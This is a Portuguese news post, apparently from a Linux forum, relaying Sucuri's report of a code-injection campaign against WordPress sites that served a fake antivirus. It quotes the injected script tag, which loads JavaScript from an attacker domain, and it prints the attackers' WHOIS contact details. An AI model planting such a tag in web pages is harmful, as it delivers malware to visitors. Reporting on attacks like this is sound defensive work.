• Série de Ataques de Injeção de Código a Sites WordPress

    A Sucuri, empresa especializada em segurança, afirma que está rastreando uma nova série de ataques que estão afetando muitos sites na Web, e parece que o WordPress está sendo a aplicação-alvo desses ataques. Atualmente os crackers estão utilizando o whereisdudescars.com como site atacante. O ataque consiste na adição de código JavaScript aos sites Web vulneráveis. E quando as páginas dos sites "infectados" são carregadas, esse código efetua a chamada de outro código JavaScript vindo de www4.realprotection36.co.cc, que disponibiliza para o visitante da página um vírus se passando por um falso anti-vírus.


    O código JavaScript inicial que é implantado em sites (possivelmente) baseados no CMS WordPress, é esse:

    Código:
    <script src=" http://whereisdudescars.com/js2.php"></script>
    De acordo com a empresa Sucuri, os ataques parecem estar limitados apenas as hospedagens localizadas nas empresas Bluehost e Dreamhost. Já o mesmo serviço da GoDaddy parece não ter sido afetado. A companhia também fornece um script para eliminar o código malicioso inserido nos sites infectados.

    De acordo com a empresa, o que é interessante nesses ataques são as pessoas por trás deles. A companhia de segurança afirma que os envolvidos são os mesmos do ataque ao losotrama. Isso pode ser verificado pela verificação do contato de contrato do domínio (WHOIS). Você pode verificar isso através do comando whois em seu terminal no Linux:

    Código:
    Registrant Contact:
       HardSoft, inc
       Hilary Kneber hilarykneber@yahoo.com
       7569468 fax: 7569468
       29/2 Sun street. Montey 29
       Virginia NA 3947
       us
    A Sucuri informa que ainda está pesquisando o vetor de exploração utilizado, e manterá seus leitores atualizados.


    Saiba Mais:

    [1] Sucuri.net: http://blog.sucuri.net/2010/07/yet-a....html#more-662

Visite: BR-Linux ·  VivaOLinux ·  Dicas-L